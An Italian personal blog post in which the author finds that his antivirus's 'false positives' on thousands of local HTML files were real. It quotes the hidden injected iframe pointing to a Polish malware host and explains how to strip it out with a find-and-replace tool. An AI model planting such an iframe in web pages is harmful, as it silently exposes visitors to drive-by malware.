info
about me

Io sono proprio così

frasi a caso

Lupus in scatula

— carne in scatola dell’antica Roma
feedz

rss post
rss commenti

 

ranking


antipixl

scarica wordpress

contattami

mail me
Chiamami con Skype

blog
ultimi commenti
  • naltro: mannaggia che piangerone
  • degra: scusa la risposta in ritardo :) no, non sono un professionista di...
  • V: Tieni corsi professionali su wp? Grazie Valentina
  • degra: Dopo i vari problemi col blog, finalmente ho ricaricato i file audio...
  • Massimo: ciao, ti prego, ti scongiuro, sono anni che vorrei riascoltare...

ultimi trackback

categorie
passato
cerca

stat

MyPagerank


Alla faccia del falso positivo…

Da alcuni mesi il mio antivirus (NOD32, ndP) mi segnala come infetti da virus (Iframe.B.Gen.Virus e Virut.NBP.Virus) tutti i file .html e .htm che ho in un disco.

La cosa mi sembrava parecchio strana, soprattutto perché negli altri PC gli stessi file vengono considerati puliti dallo stesso antivirus. Ed è un bel fastidio vedere qualche centinaio di notifiche ogni volta che apri la cartella Documenti.

Notifiche, peraltro, su cui cliccare sempre “Ignora”, dal momento che l’antivirus non è in gradi di ripulire i file e si limita a cestinarli.

Oggi pomeriggio ho avuto un’illuminazione: perché non provare ad aprire un file html piccolo, tra quelli infetti, e vedere cosa contiene?

Ebbene, l’ultima riga prima di </body> conteneva codice malevolo, ovvero un iframe che puntava ad un indirizzo polacco:

< iframe src="http://jL.chura.pl/rc/" style="display:none" >< /iframe >

È bastato copiancollarlo su Google per scoprire cosa fosse e come liberarsene.

Nonostante la mole di file infettati (5000 nel mio caso) è semplicissimo disinfettare il tutto: basta scaricare il programma Advanced Find And Replace, scegliere il percorso dei file da pulire e dargli in pasto la stringa (quella scritta qui sopra) da sostituire con nulla. Dopo qualche minuto il programma terminerà e tutto sarà fresco e pulito.

Ovviamente è necessario disattivare l’antivirus per poter accedere ai file incriminati.

Morale? Migliaia di falsi positivi, probabilmente non sono poi tanto falsi, e dare un’occhiata un po’ più approfondita non fa mai male.

E mille scuse al NOD antivirus :)


Se questo argomento ti interessa puoi provare...

Apple TV 2g untethered jailbreak Tuesday 15 February 2011

Mali di stagione Tuesday 14 October 2008

Bianco e nero Monday 10 December 2007

  

Social

twitta il post condividi su Facebook

ci sono 2 commenti per "Alla faccia del falso positivo…"

  1. gabrybabelle scrive:
    usando Internet Explorer Internet Explorer 8.0 su Windows Windows Vista

    Usa AVG Free 9.0,gratuito, ti segue in navigazione web,sniffando le pagine in real time,e funziona da Dio su tutto

    http://friendfeed.com/gabrybabelle

    • degra scrive:
      usando Flock Flock 2.5.6 su Windows Windows 7

      Non so, ho sentito parlare bene e male di AVG. Io mi trovo bene con NOD: è molto veloce, ha scansione in real time per tutto. Ogni tanto ha qualche falso positivo, tipo i keygen 😛